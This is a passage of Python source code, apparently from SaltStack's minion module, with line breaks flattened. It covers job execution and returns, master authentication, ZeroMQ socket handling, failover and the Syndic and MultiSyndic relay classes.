{1}'.format( function_name, exc ), exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR: {0}'.format(exc) ret['out'] = 'nested' except SaltInvocationError as exc: log.error( 'Problem executing {0!r}: {1}'.format( function_name, exc ), exc_info_on_loglevel=logging.DEBUG ) ret['return'] = 'ERROR executing {0!r}: {1}'.format( function_name, exc ) ret['out'] = 'nested' except TypeError as exc: msg = ('TypeError encountered executing {0}: {1}. See ' 'debug log for more info.').format(function_name, exc) log.warning(msg, exc_info_on_loglevel=logging.DEBUG) ret['return'] = msg ret['out'] = 'nested' except Exception: msg = 'The minion function caused an exception' log.warning(msg, exc_info_on_loglevel=logging.DEBUG) ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc()) ret['out'] = 'nested' else: ret['return'] = '{0!r} is not available.'.format(function_name) mod_name = function_name.split('.')[0] if mod_name in minion_instance.function_errors: ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name]) ret['success'] = False ret['retcode'] = 254 ret['out'] = 'nested' ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'master_id' in data: ret['master_id'] = data['master_id'] if 'metadata' in data: if isinstance(data['metadata'], dict): ret['metadata'] = data['metadata'] else: log.warning('The metadata parameter must be a dictionary. Ignoring.') minion_instance._return_pub(ret) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] ret['id'] = opts['id'] for returner in set(data['ret'].split(',')): try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job {0} {1}'.format( data['jid'], exc ) ) log.error(traceback.format_exc()) @classmethod def _thread_multi_return(cls, minion_instance, opts, data): ''' This method should be used as a threading target, start the actual minion side execution. ''' salt.utils.appendproctitle(data['jid']) # this seems awkward at first, but it's a workaround for Windows # multiprocessing communication. if not minion_instance: minion_instance = cls(opts) ret = { 'return': {}, 'success': {}, } for ind in range(0, len(data['fun'])): ret['success'][data['fun'][ind]] = False try: func = minion_instance.functions[data['fun'][ind]] args, kwargs = load_args_and_kwargs( func, data['arg'][ind], data) ret['return'][data['fun'][ind]] = func(*args, **kwargs) ret['success'][data['fun'][ind]] = True except Exception as exc: trb = traceback.format_exc() log.warning( 'The minion function caused an exception: {0}'.format( exc ) ) ret['return'][data['fun'][ind]] = trb ret['jid'] = data['jid'] ret['fun'] = data['fun'] ret['fun_args'] = data['arg'] if 'metadata' in data: ret['metadata'] = data['metadata'] minion_instance._return_pub(ret) if data['ret']: if 'ret_config' in data: ret['ret_config'] = data['ret_config'] for returner in set(data['ret'].split(',')): ret['id'] = opts['id'] try: minion_instance.returners['{0}.returner'.format( returner )](ret) except Exception as exc: log.error( 'The return failed for job {0} {1}'.format( data['jid'], exc ) ) def _return_pub(self, ret, ret_cmd='_return'): ''' Return the data from the executed command to the master server ''' jid = ret.get('jid', ret.get('__jid__')) fun = ret.get('fun', ret.get('__fun__')) if self.opts['multiprocessing']: fn_ = os.path.join(self.proc_dir, jid) if os.path.isfile(fn_): try: os.remove(fn_) except (OSError, IOError): # The file is gone already pass log.info('Returning information for job: {0}'.format(jid)) channel = salt.transport.Channel.factory(self.opts) if ret_cmd == '_syndic_return': load = {'cmd': ret_cmd, 'id': self.opts['id'], 'jid': jid, 'fun': fun, 'load': ret.get('__load__')} load['return'] = {} for key, value in ret.items(): if key.startswith('__'): continue load['return'][key] = value else: load = {'cmd': ret_cmd, 'id': self.opts['id']} for key, value in list(ret.items()): load[key] = value if 'out' in ret: if isinstance(ret['out'], string_types): load['out'] = ret['out'] else: log.error('Invalid outputter {0}. This is likely a bug.' .format(ret['out'])) else: try: oput = self.functions[fun].__outputter__ except (KeyError, AttributeError, TypeError): pass else: if isinstance(oput, string_types): load['out'] = oput if self.opts['cache_jobs']: # Local job cache has been enabled fn_ = os.path.join( self.opts['cachedir'], 'minion_jobs', load['jid'], 'return.p') jdir = os.path.dirname(fn_) if not os.path.isdir(jdir): os.makedirs(jdir) salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret)) try: ret_val = channel.send(load) except SaltReqTimeoutError: msg = ('The minion failed to return the job information for job ' '{0}. This is often due to the master being shut down or ' 'overloaded. If the master is running consider increasing ' 'the worker_threads value.').format(jid) log.warn(msg) return '' log.trace('ret_val = {0}'.format(ret_val)) return ret_val def _state_run(self): ''' Execute a state run based on information set in the minion config file ''' if self.opts['startup_states']: data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')} if self.opts['startup_states'] == 'sls': data['fun'] = 'state.sls' data['arg'] = [self.opts['sls_list']] elif self.opts['startup_states'] == 'top': data['fun'] = 'state.top' data['arg'] = [self.opts['top_file']] else: data['fun'] = 'state.highstate' data['arg'] = [] self._handle_decoded_payload(data) def _refresh_grains_watcher(self, refresh_interval_in_minutes): ''' Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion :param refresh_interval_in_minutes: :return: None ''' if '__update_grains' not in self.opts.get('schedule', {}): if 'schedule' not in self.opts: self.opts['schedule'] = {} self.opts['schedule'].update({ '__update_grains': { 'function': 'event.fire', 'args': [{}, 'grains_refresh'], 'minutes': refresh_interval_in_minutes } }) def _set_tcp_keepalive(self): if hasattr(zmq, 'TCP_KEEPALIVE'): self.socket.setsockopt( zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive'] ) self.socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle'] ) self.socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt'] ) self.socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl'] ) def _set_reconnect_ivl(self): recon_delay = self.opts['recon_default'] if self.opts['recon_randomize']: recon_delay = randint(self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max'] ) log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format( self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max'], recon_delay) ) log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay)) self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay) def _set_reconnect_ivl_max(self): if hasattr(zmq, 'RECONNECT_IVL_MAX'): log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format( self.opts['recon_default'] + self.opts['recon_max']) ) self.socket.setsockopt( zmq.RECONNECT_IVL_MAX, self.opts['recon_max'] ) def _set_ipv4only(self): if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self.socket.setsockopt(zmq.IPV4ONLY, 0) def _fire_master_minion_start(self): # Send an event to the master that the minion is live self._fire_master( 'Minion {0} started at {1}'.format( self.opts['id'], time.asctime() ), 'minion_start' ) # dup name spaced event self._fire_master( 'Minion {0} started at {1}'.format( self.opts['id'], time.asctime() ), tagify([self.opts['id'], 'start'], 'minion'), ) def _setsockopts(self): if self.opts['zmq_filtering']: # TODO: constants file for "broadcast" self.socket.setsockopt(zmq.SUBSCRIBE, 'broadcast') self.socket.setsockopt(zmq.SUBSCRIBE, self.hexid) else: self.socket.setsockopt(zmq.SUBSCRIBE, '') self.socket.setsockopt(zmq.IDENTITY, self.opts['id']) self._set_ipv4only() self._set_reconnect_ivl_max() self._set_tcp_keepalive() @property def master_pub(self): ''' Return the master publish port ''' return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'], port=self.publish_port) def authenticate(self, timeout=60, safe=True): ''' Authenticate with the master, this method breaks the functional paradigm, it will update the master information from a fresh sign in, signing in can occur as often as needed to keep up with the revolving master AES key. ''' log.debug( 'Attempting to authenticate with the Salt Master at {0}'.format( self.opts['master_ip'] ) ) auth = salt.crypt.Auth(self.opts) self.tok = auth.gen_token('salt') acceptance_wait_time = self.opts['acceptance_wait_time'] acceptance_wait_time_max = self.opts['acceptance_wait_time_max'] if not acceptance_wait_time_max: acceptance_wait_time_max = acceptance_wait_time while True: creds = auth.sign_in(timeout, safe) if creds == 'full': return creds elif creds != 'retry': log.info('Authentication with master at {0} successful!'.format(self.opts['master_ip'])) break log.info('Waiting for minion key to be accepted by the master.') if acceptance_wait_time: log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time)) time.sleep(acceptance_wait_time) if acceptance_wait_time < acceptance_wait_time_max: acceptance_wait_time += acceptance_wait_time log.debug('Authentication wait time is {0}'.format(acceptance_wait_time)) self.aes = creds['aes'] if self.opts.get('syndic_master_publish_port'): self.publish_port = self.opts.get('syndic_master_publish_port') else: self.publish_port = creds['publish_port'] self.crypticle = salt.crypt.Crypticle(self.opts, self.aes) def module_refresh(self, force_refresh=False): ''' Refresh the functions and returners. ''' self.functions, self.returners, _ = self._load_modules(force_refresh) self.schedule.functions = self.functions self.schedule.returners = self.returners def pillar_refresh(self, force_refresh=False): ''' Refresh the pillar ''' self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['environment'], ).compile_pillar() self.module_refresh(force_refresh) def manage_schedule(self, package): ''' Refresh the functions and returners. ''' tag, data = salt.utils.event.MinionEvent.unpack(package) func = data.get('func', None) name = data.get('name', None) schedule = data.get('schedule', None) where = data.get('where', None) if func == 'delete': self.schedule.delete_job(name) elif func == 'add': self.schedule.add_job(schedule) elif func == 'modify': self.schedule.modify_job(name, schedule, where) elif func == 'enable': self.schedule.enable_schedule() elif func == 'disable': self.schedule.disable_schedule() elif func == 'enable_job': self.schedule.enable_job(name, where) elif func == 'run_job': self.schedule.run_job(name, where) elif func == 'disable_job': self.schedule.disable_job(name, where) elif func == 'reload': self.schedule.reload(schedule) def environ_setenv(self, package): ''' Set the salt-minion main process environment according to the data contained in the minion event data ''' tag, data = salt.utils.event.MinionEvent.unpack(package) environ = data.get('environ', None) if environ is None: return False false_unsets = data.get('false_unsets', False) clear_all = data.get('clear_all', False) import salt.modules.environ as mod_environ return mod_environ.setenv(environ, false_unsets, clear_all) def clean_die(self, signum, frame): ''' Python does not handle the SIGTERM cleanly, if it is signaled exit the minion process cleanly ''' self._running = False exit(0) def _pre_tune(self): ''' Set the minion running flag and issue the appropriate warnings if the minion cannot be started or is already running ''' if self._running is None: self._running = True elif self._running is False: log.error( 'This {0} was scheduled to stop. Not running ' '{0}.tune_in()'.format(self.__class__.__name__) ) return elif self._running is True: log.error( 'This {0} is already running. Not running ' '{0}.tune_in()'.format(self.__class__.__name__) ) return try: log.info( '{0} is starting as user \'{1}\''.format( self.__class__.__name__, salt.utils.get_user() ) ) except Exception as err: # Only windows is allowed to fail here. See #3189. Log as debug in # that case. Else, error. log.log( salt.utils.is_windows() and logging.DEBUG or logging.ERROR, 'Failed to get the user who is starting {0}'.format( self.__class__.__name__ ), exc_info=err ) def _mine_send(self, package): ''' Send mine data to the master ''' channel = salt.transport.Channel.factory(self.opts) load = salt.utils.event.SaltEvent.unpack(package)[1] ret = channel.send(load) return ret def handle_event(self, package): ''' Handle an event from the epull_sock (all local minion events) ''' log.debug('Handling event {0!r}'.format(package)) if package.startswith('module_refresh'): self.module_refresh() elif package.startswith('pillar_refresh'): self.pillar_refresh() elif package.startswith('manage_schedule'): self.manage_schedule(package) elif package.startswith('grains_refresh'): if self.grains_cache != self.opts['grains']: self.pillar_refresh(force_refresh=True) self.grains_cache = self.opts['grains'] elif package.startswith('environ_setenv'): self.environ_setenv(package) elif package.startswith('_minion_mine'): self._mine_send(package) elif package.startswith('fire_master'): tag, data = salt.utils.event.MinionEvent.unpack(package) log.debug('Forwarding master event tag={tag}'.format(tag=data['tag'])) self._fire_master(data['data'], data['tag'], data['events'], data['pretag']) elif package.startswith('__master_disconnected'): tag, data = salt.utils.event.MinionEvent.unpack(package) # if the master disconnect event is for a different master, raise an exception if data['master'] != self.opts['master']: raise Exception() if self.connected: # we are not connected anymore self.connected = False # modify the scheduled job to fire only on reconnect schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master_ip': self.opts['master'], 'connected': False} } self.schedule.modify_job(name='__master_alive', schedule=schedule) log.info('Connection to master {0} lost'.format(self.opts['master'])) if self.opts['master_type'] == 'failover': log.info('Trying to tune in to next master from master-list') # if eval_master finds a new master for us, self.connected # will be True again on successfull master authentication self.opts['master'] = self.eval_master(opts=self.opts, failed=True) if self.connected: # re-init the subsystems to work with the new master log.info('Re-initialising subsystems for new ' 'master {0}'.format(self.opts['master'])) del self.socket del self.context del self.poller self._init_context_and_poller() self.socket = self.context.socket(zmq.SUB) self._set_reconnect_ivl() self._setsockopts() self.socket.connect(self.master_pub) self.poller.register(self.socket, zmq.POLLIN) self.poller.register(self.epull_sock, zmq.POLLIN) self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # update scheduled job to run with the new master addr schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master_ip': self.opts['master'], 'connected': True} } self.schedule.modify_job(name='__master_alive', schedule=schedule) elif package.startswith('__master_connected'): # handle this event only once. otherwise it will pollute the log if not self.connected: log.info('Connection to master {0} re-established'.format(self.opts['master'])) self.connected = True # modify the __master_alive job to only fire, # if the connection is lost again schedule = { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 2, 'kwargs': {'master_ip': self.opts['master'], 'connected': True} } self.schedule.modify_job(name='__master_alive', schedule=schedule) # Main Minion Tune In def tune_in(self): ''' Lock onto the publisher. This is the main event loop for the minion :rtype : None ''' self._pre_tune() # Properly exit if a SIGTERM is signalled signal.signal(signal.SIGTERM, self.clean_die) log.debug('Minion {0!r} trying to tune in'.format(self.opts['id'])) self._prepare_minion_event_system() self.socket = self.context.socket(zmq.SUB) self._set_reconnect_ivl() self._setsockopts() self.socket.connect(self.master_pub) self.poller.register(self.socket, zmq.POLLIN) self.poller.register(self.epull_sock, zmq.POLLIN) self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() # Make sure to gracefully handle CTRL_LOGOFF_EVENT salt.utils.enable_ctrl_logoff_handler() # On first startup execute a state run if configured to do so self._state_run() loop_interval = int(self.opts['loop_interval']) try: if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds! if self.opts['grains_refresh_every'] > 1: log.debug( 'Enabling the grains refresher. Will run every {0} minutes.'.format( self.opts['grains_refresh_every']) ) else: # Clean up minute vs. minutes in log message log.debug( 'Enabling the grains refresher. Will run every {0} minute.'.format( self.opts['grains_refresh_every']) ) self._refresh_grains_watcher( abs(self.opts['grains_refresh_every']) ) except Exception as exc: log.error( 'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format( exc) ) ping_interval = self.opts.get('ping_interval', 0) * 60 ping_at = None while self._running is True: loop_interval = self.process_schedule(self, loop_interval) try: socks = self._do_poll(loop_interval) if ping_interval > 0: if socks or not ping_at: ping_at = time.time() + ping_interval if ping_at < time.time(): log.debug('Ping master') self._fire_master('ping', 'minion_ping') ping_at = time.time() + ping_interval self._do_socket_recv(socks) # Check the event system if socks.get(self.epull_sock) == zmq.POLLIN: package = self.epull_sock.recv(zmq.NOBLOCK) try: self.handle_event(package) self.epub_sock.send(package) except Exception: log.debug('Exception while handling events', exc_info=True) # Add an extra fallback in case a forked process leeks through multiprocessing.active_children() except zmq.ZMQError as exc: # The interrupt caused by python handling the # SIGCHLD. Throws this error with errno == EINTR. # Nothing to receive on the zmq socket throws this error # with EAGAIN. # Both are safe to ignore if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR: log.critical('Unexpected ZMQError while polling minion', exc_info=True) continue except SaltClientError: raise except Exception: log.critical( 'An exception occurred while polling the minion', exc_info=True ) def tune_in_no_block(self): ''' Executes the tune_in sequence but omits extra logging and the management of the event bus assuming that these are handled outside the tune_in sequence ''' self._pre_tune() self._init_context_and_poller() self.socket = self.context.socket(zmq.SUB) self._setsockopts() self.socket.connect(self.master_pub) self.poller.register(self.socket, zmq.POLLIN) self._fire_master_minion_start() loop_interval = int(self.opts['loop_interval']) # On first startup execute a state run if configured to do so self._state_run() while self._running is True: try: socks = self._do_poll(loop_interval) self._do_socket_recv(socks) # Check the event system except zmq.ZMQError: # If a zeromq error happens recover yield True except Exception: log.critical( 'An exception occurred while polling the minion', exc_info=True ) yield True def _do_poll(self, loop_interval): log.trace('Check main poller timeout {0}'.format(loop_interval)) return dict(self.poller.poll( loop_interval * 1000) ) def _do_socket_recv(self, socks): if socks.get(self.socket) == zmq.POLLIN: # topic filtering is done at the zmq level, so we just strip it messages = self.socket.recv_multipart(zmq.NOBLOCK) messages_len = len(messages) # if it was one message, then its old style if messages_len == 1: payload = self.serial.loads(messages[0]) # 2 includes a header which says who should do it elif messages_len == 2: payload = self.serial.loads(messages[1]) else: raise Exception(('Invalid number of messages ({0}) in zeromq pub' 'message from master').format(len(messages_len))) log.trace('Handling payload') self._handle_payload(payload) def destroy(self): ''' Tear down the minion ''' self._running = False if getattr(self, 'poller', None) is not None: if isinstance(self.poller.sockets, dict): for socket in self.poller.sockets.keys(): if socket.closed is False: socket.close() self.poller.unregister(socket) else: for socket in self.poller.sockets: if socket[0].closed is False: socket[0].close() self.poller.unregister(socket[0]) if hasattr(self, 'epub_sock') and self.epub_sock.closed is False: self.epub_sock.close() if hasattr(self, 'epull_sock') and self.epull_sock.closed is False: self.epull_sock.close() if hasattr(self, 'socket') and self.socket.closed is False: self.socket.close() if hasattr(self, 'context') and self.context.closed is False: self.context.term() def __del__(self): self.destroy() class Syndic(Minion): ''' Make a Syndic minion, this minion will use the minion keys on the master to authenticate with a higher level master. ''' def __init__(self, opts, **kwargs): self._syndic_interface = opts.get('interface') self._syndic = True # force auth_safemode True because Syndic don't support autorestart opts['auth_safemode'] = True opts['loop_interval'] = 1 super(Syndic, self).__init__(opts, **kwargs) self.mminion = salt.minion.MasterMinion(opts) def _handle_aes(self, load, sig=None): ''' Takes the AES encrypted load, decrypts it, and runs the encapsulated instructions ''' # If the AES authentication has changed, re-authenticate try: data = self.crypticle.loads(load) except AuthenticationError: self.authenticate() data = self.crypticle.loads(load) # Verify that the publication is valid if 'tgt' not in data or 'jid' not in data or 'fun' not in data \ or 'arg' not in data: return data['to'] = int(data.get('to', self.opts['timeout'])) - 1 if 'user' in data: log.debug( 'User {0[user]} Executing syndic command {0[fun]} with ' 'jid {0[jid]}'.format( data ) ) else: log.debug( 'Executing syndic command {0[fun]} with jid {0[jid]}'.format( data ) ) log.debug('Command details: {0}'.format(data)) self._handle_decoded_payload(data) def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' self.syndic_cmd(data) def syndic_cmd(self, data): ''' Take the now clear load and forward it on to the client cmd ''' # Set up default tgt_type if 'tgt_type' not in data: data['tgt_type'] = 'glob' kwargs = {} # optionally add a few fields to the publish data for field in ('master_id', # which master the job came from 'user', # which user ran the job ): if field in data: kwargs[field] = data[field] # Send out the publication self.local.pub(data['tgt'], data['fun'], data['arg'], data['tgt_type'], data['ret'], data['jid'], data['to'], user=data.get('user', ''), **kwargs) def _setsockopts(self): # no filters for syndication masters, unless we want to maintain a # list of all connected minions and update the filter self.socket.setsockopt(zmq.SUBSCRIBE, '') self.socket.setsockopt(zmq.IDENTITY, self.opts['id']) self._set_reconnect_ivl_max() self._set_tcp_keepalive() self._set_ipv4only() def _fire_master_syndic_start(self): # Send an event to the master that the minion is live self._fire_master( 'Syndic {0} started at {1}'.format( self.opts['id'], time.asctime() ), 'syndic_start' ) self._fire_master( 'Syndic {0} started at {1}'.format( self.opts['id'], time.asctime() ), tagify([self.opts['id'], 'start'], 'syndic'), ) def tune_in_no_block(self): ''' Executes the tune_in sequence but omits extra logging and the management of the event bus assuming that these are handled outside the tune_in sequence ''' # Instantiate the local client self.local = salt.client.get_local_client(self.opts['_minion_conf_file']) self.local.event.subscribe('') self._init_context_and_poller() self.socket = self.context.socket(zmq.SUB) self._setsockopts() self.socket.connect(self.master_pub) self.poller.register(self.socket, zmq.POLLIN) loop_interval = int(self.opts['loop_interval']) self._fire_master_syndic_start() while True: try: socks = dict(self.poller.poll(loop_interval * 1000)) if socks.get(self.socket) == zmq.POLLIN: self._process_cmd_socket() except zmq.ZMQError: yield True except Exception: log.critical( 'An exception occurred while polling the minion', exc_info=True ) yield True # Syndic Tune In def tune_in(self): ''' Lock onto the publisher. This is the main event loop for the syndic ''' signal.signal(signal.SIGTERM, self.clean_die) log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id'])) self._init_context_and_poller() # Instantiate the local client self.local = salt.client.get_local_client(self.opts['_minion_conf_file']) self.local.event.subscribe('') self.local.opts['interface'] = self._syndic_interface # register the event sub to the poller self.poller.register(self.local.event.sub) # Start with the publish socket # Share the poller with the event object self.socket = self.context.socket(zmq.SUB) self._setsockopts() self.socket.connect(self.master_pub) self.poller.register(self.socket, zmq.POLLIN) # Send an event to the master that the minion is live self._fire_master_syndic_start() # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() loop_interval = int(self.opts['loop_interval']) self._reset_event_aggregation() while True: try: # Do all the maths in seconds timeout = loop_interval if self.event_forward_timeout is not None: timeout = min(timeout, self.event_forward_timeout - time.time()) if timeout >= 0: log.trace('Polling timeout: %f', timeout) socks = dict(self.poller.poll(timeout * 1000)) else: # This shouldn't really happen. # But there's no harm being defensive log.warning('Negative timeout in syndic main loop') socks = {} if socks.get(self.socket) == zmq.POLLIN: self._process_cmd_socket() if socks.get(self.local.event.sub) == zmq.POLLIN: self._process_event_socket() if self.event_forward_timeout is not None and \ self.event_forward_timeout < time.time(): self._forward_events() # We don't handle ZMQErrors like the other minions # I've put explicit handling around the receive calls # in the process_*_socket methods. If we see any other # errors they may need some kind of handling so log them # for now. except Exception: log.critical( 'An exception occurred while polling the syndic', exc_info=True ) def _process_cmd_socket(self): try: messages = self.socket.recv_multipart(zmq.NOBLOCK) messages_len = len(messages) idx = None if messages_len == 1: idx = 0 elif messages_len == 2: idx = 1 else: raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len)) payload = self.serial.loads(messages[idx]) except zmq.ZMQError as e: # Swallow errors for bad wakeups or signals needing processing if e.errno != errno.EAGAIN and e.errno != errno.EINTR: raise log.trace('Handling payload') self._handle_payload(payload) def _reset_event_aggregation(self): self.jids = {} self.raw_events = [] self.event_forward_timeout = None def _process_event_socket(self): tout = time.time() + self.opts['syndic_max_event_process_time'] while tout > time.time(): try: event = self.local.event.get_event_noblock() except zmq.ZMQError as e: # EAGAIN indicates no more events at the moment # EINTR some kind of signal maybe someone trying # to get us to quit so escape our timeout if e.errno == errno.EAGAIN or e.errno == errno.EINTR: break raise log.trace('Got event {0}'.format(event['tag'])) if self.event_forward_timeout is None: self.event_forward_timeout = ( time.time() + self.opts['syndic_event_forward_timeout'] ) if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']: if 'jid' not in event['data']: # Not a job return continue jdict = self.jids.setdefault(event['tag'], {}) if not jdict: jdict['__fun__'] = event['data'].get('fun') jdict['__jid__'] = event['data']['jid'] jdict['__load__'] = {} fstr = '{0}.get_jid'.format(self.opts['master_job_cache']) jdict['__load__'].update( self.mminion.returners[fstr](event['data']['jid']) ) if 'master_id' in event['data']: jdict['master_id'] = event['data']['master_id'] jdict[event['data']['id']] = event['data']['return'] else: # Add generic event aggregation here if 'retcode' not in event['data']: self.raw_events.append(event) def _forward_events(self): log.trace('Forwarding events') if self.raw_events: self._fire_master(events=self.raw_events, pretag=tagify(self.opts['id'], base='syndic'), ) for jid in self.jids: self._return_pub(self.jids[jid], '_syndic_return') self._reset_event_aggregation() def destroy(self): ''' Tear down the syndic minion ''' # We borrowed the local clients poller so give it back before # it's destroyed. Reset the local poller reference. self.poller = None super(Syndic, self).destroy() if hasattr(self, 'local'): del self.local class MultiSyndic(MinionBase): ''' Make a MultiSyndic minion, this minion will handle relaying jobs and returns from all minions connected to it to the list of masters it is connected to. Note: jobs will be returned best-effort to the requesting master. This also means (since we are using zmq) that if a job was fired and the master disconnects between the publish and return, that the return will end up in a zmq buffer in this Syndic headed to that original master. In addition, since these classes all seem to use a mix of blocking and non-blocking calls (with varying timeouts along the way) this daemon does not handle failure well, it will (under most circumstances) stall the daemon for ~60s attempting to re-auth with the down master ''' # time to connect to upstream master SYNDIC_CONNECT_TIMEOUT = 5 def __init__(self, opts): opts['loop_interval'] = 1 super(MultiSyndic, self).__init__(opts) self.mminion = salt.minion.MasterMinion(opts) # create all of the syndics you need self.master_syndics = {} for master in set(self.opts['master']): s_opts = copy.copy(self.opts) s_opts['master'] = master self.master_syndics[master] = {'opts': s_opts, 'auth_wait': s_opts['acceptance_wait_time'], 'dead_until': 0} self._connect_to_master(master) # TODO: do we need all of this? def _connect_to_master(self, master): ''' Attempt to connect to master, including back-off for each one return boolean of whether you connected or not ''' if master not in self.master_syndics: log.error('Unable to connect to {0}, not in the list of masters'.format(master)) return False minion = self.master_syndics[master] # if we need to be dead for a while, stay that way if minion['dead_until'] > time.time(): return False if time.time() - minion['auth_wait'] > minion.get('last', 0): try: t_minion = Syndic(minion['opts'], timeout=self.SYNDIC_CONNECT_TIMEOUT, safe=False, ) self.master_syndics[master]['syndic'] = t_minion self.master_syndics[master]['generator'] = t_minion.tune_in_no_block() self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time'] self.master_syndics[master]['dead_until'] = 0 return True except SaltClientError: log.error('Error while bring up minion for multi-syndic. Is master {0} responding?'.format(master)) # re-use auth-wait as backoff for syndic minion['dead_until'] = time.time() + minion['auth_wait'] if minion['auth_wait'] < self.opts['acceptance_wait_time_max']: minion['auth_wait'] += self.opts['acceptance_wait_time'] return False def _call_syndic(self, func, args=(), kwargs=None, master_id=None): ''' Wrapper to call a given func on a syndic, best effort to get the one you asked for ''' if kwargs is None: kwargs = {} for master, syndic_dict in self.iter_master_options(master_id): if 'syndic' not in syndic_dict: continue if syndic_dict['dead_until'] > time.time(): log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master_id)) continue try: getattr(syndic_dict['syndic'], func)(*args, **kwargs) return except SaltClientError: log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id)) # re-use auth-wait as backoff for syndic syndic_dict['dead_until'] = time.time() + syndic_dict['auth_wait'] if syndic_dict['auth_wait'] < self.opts['acceptance_wait_time_max']: syndic_dict['auth_wait'] += self.opts['acceptance_wait_time'] continue log.critical('Unable to call {0} on any masters!'.format(func)) def iter_master_options(self, master_id=None): ''' Iterate (in order) over your options for master ''' masters = list(self.master_syndics.keys()) shuffle(masters) if master_id not in self.master_syndics: master_id = masters.pop(0) else: masters.remove(master_id) while True: yield master_id, self.master_syndics[master_id] if len(masters) == 0: break master_id = masters.pop(0) def _reset_event_aggregation(self): self.jids = {} self.raw_events = [] self.event_forward_timeout = None # Syndic Tune In def tune_in(self): ''' Lock onto the publisher. This is the main event loop for the syndic ''' # Instantiate the local client self.local = salt.client.get_local_client(self.opts['_minion_conf_file']) self.local.event.subscribe('') log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id'])) # Share the poller with the event object self.poller = self.local.event.poller # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() loop_interval = int(self.opts['loop_interval']) self._reset_event_aggregation() while True: try: # Do all the maths in seconds timeout = loop_interval if self.event_forward_timeout is not None: timeout = min(timeout, self.event_forward_timeout - time.time()) if timeout >= 0: log.trace('Polling timeout: %f', timeout) socks = dict(self.poller.poll(timeout * 1000)) else: # This shouldn't really happen. # But there's no harm being defensive log.warning('Negative timeout in syndic main loop') socks = {} # check all of your master_syndics, have them do their thing for master_id, syndic_dict in self.master_syndics.items(): # if not connected, lets try if 'generator' not in syndic_dict: # if we couldn't connect, lets try later if not self._connect_to_master(master_id): continue next(syndic_dict['generator']) # events if socks.get(self.local.event.sub) == zmq.POLLIN: self._process_event_socket() if (self.event_forward_timeout is not None and self.event_forward_timeout < time.time()): self._forward_events() # We don't handle ZMQErrors like the other minions # I've put explicit handling around the receive calls # in the process_*_socket methods. If we see any other # errors they may need some kind of handling so log them # for now. except Exception: log.critical( 'An exception occurred while polling the syndic', exc_info=True ) def _process_event_socket(self): tout = time.time() + self.opts['syndic_max_event_process_time'] while tout > time.time(): try: event = self.local.event.get_event_noblock() except zmq.ZMQError as e: # EAGAIN indicates no more events at the moment # EINTR some kind of signal maybe someone trying # to get us to quit so escape our timeout if e.errno == errno.EAGAIN or e.errno == errno.EINTR: break raise log.trace('Got event {0}'.format(event['tag'])) if self.event_forward_timeout is None: self.event_forward_timeout = ( time.time() + self.opts['syndic_event_forward_timeout'] ) if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']: if 'jid' not in event['data']: # Not a job return continue jdict = self.jids.setdefault(event['tag'], {}) if not jdict: jdict['__fun__'] = event['data'].get('fun') jdict['__jid__'] = event['data']['jid'] jdict['__load__'] = {} fstr = '{0}.get_jid'.format(self.opts['master_job_cache']) jdict['__load__'].update( self.mminion.returners[fstr](event['data']['jid']) ) if 'master_id' in event['data']: # __'s to make sure it doesn't print out on the master cli jdict['__master_id__'] = event['data']['master_id'] jdict[event['data']['id']] = event['data']['return'] else: # Add generic event aggregation here if 'retcode' not in event['data']: self.raw_events.append(event) def _forward_events(self): log.trace('Forwarding events') if self.raw_events: self._call_syndic('_fire_master', kwargs={'events': self.raw_events, 'pretag': tagify(self.opts['id'], base='syndic')}, ) for jid, jid_ret in self.jids.items(): self._call_syndic('_return_pub', args=(jid_ret, '_syndic_return'), master_id=jid_ret.get('__master_id__')) self._reset_event_aggregation() class Matcher(object): ''' Use to return the value for matching calls from the master ''' def __init__(self, opts, functions=None): self.opts = opts self.functions = functions def 